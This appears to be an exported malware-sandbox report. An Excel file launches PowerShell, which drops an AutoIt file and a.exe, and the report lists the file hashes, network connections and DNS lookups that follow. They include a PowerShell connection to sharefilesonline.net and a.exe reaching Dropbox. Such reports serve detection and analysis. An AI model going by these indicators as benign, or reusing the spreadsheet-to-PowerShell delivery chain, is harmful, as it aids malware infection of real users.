4560 powershell.exe | C:\Users\admin\Documents\MixDep2025.xlsx | compressed
MD5: 9E26F110937F73E856D38D2E733B27C3
SHA256: E2CD27668646BA938A0A3429488CBD12C717CD17A58BB7BCBB08CED5576914C0

4560 powershell.exe | C:\Users\admin\AppData\Local\Temp\P.a3x | binary
MD5: 12D4CCEE2835AB497DE4D8C12C7F3AB6
SHA256: CBC8A218DEC949323C2952CA672A854CDF1AAC635BF08C6342D0C568D6F48578

4560 powershell.exe | C:\Users\admin\AppData\Local\Temp\a.exe | executable
MD5: 0ADB9B817F1DF7807576C2D7068DD931
SHA256: 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B

7904 a.exe | C:\ProgramData\py.zip | html
MD5: CB4BA972B7C65FA077C154C26F0750F0
SHA256: C5B27B9C0A09C33862899F343C1F8D848B4674F80F4D27119C97C23F64F64310

8092 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rrykrgzk.mr5.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

7904 a.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E573CDF4C6D731D56A665145182FD759_5A9FE11E8B6335FDA91281200971E038 | binary
MD5: 5E1A54E778A82F59BE129D7D6247AE0E
SHA256: F07D43D8AE3A579DACE70B0403A986320DE1ED72EED5B61C02C6438CD0B27998

8092 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eksr4kf2.ih5.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

7872 BackgroundTransferHost.exe | C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f92f0722-10a8-4bab-855f-c9a8a91455c6.down_data | (type not recorded)
MD5:
SHA256:

8092 powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4lhrpwbe.emh.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
39
DNS requests
28
Threats
1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
(Type and Size were empty for every request in the export and are omitted.)

- | - | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
7724 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
7404 | EXCEL.EXE | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
7904 | a.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D | unknown | whitelisted
7904 | a.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTk45WiKdPUwcMf8JgMC07ACYqr2AQUt2ui6qiqhIx56rTaD5iyxZV2ufQCEAyVRp0LO%2F899HuOUNmwbkY%3D | unknown | whitelisted
2148 | backgroundTaskHost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
7724 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
7404 | EXCEL.EXE | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | whitelisted
7872 | BackgroundTransferHost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation

- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
6544 | svchost.exe | 40.126.32.136:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
3216 | svchost.exe | 40.115.3.253:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5496 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4560 | powershell.exe | 66.248.206.135:443 | sharefilesonline.net | Hostkey B.v. | NL | unknown
7904 | a.exe | 162.125.66.18:443 | www.dropbox.com | DROPBOX | DE | whitelisted
7904 | a.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.164
whitelisted
google.com
  • 142.250.185.174
whitelisted
login.live.com
  • 40.126.32.136
  • 20.190.160.20
  • 40.126.32.140
  • 40.126.32.134
  • 20.190.160.5
  • 20.190.160.130
  • 40.126.32.74
  • 20.190.160.66
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 2.23.77.188
whitelisted
client.wns.windows.com
  • 40.115.3.253
whitelisted
sharefilesonline.net
  • 66.248.206.135
unknown
www.dropbox.com
  • 162.125.66.18
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted

Threats

PID | Process | Class | Message

7904 | a.exe | Potential Corporate Privacy Violation | ET INFO Dropbox.com Offsite File Backup in Use
No debug info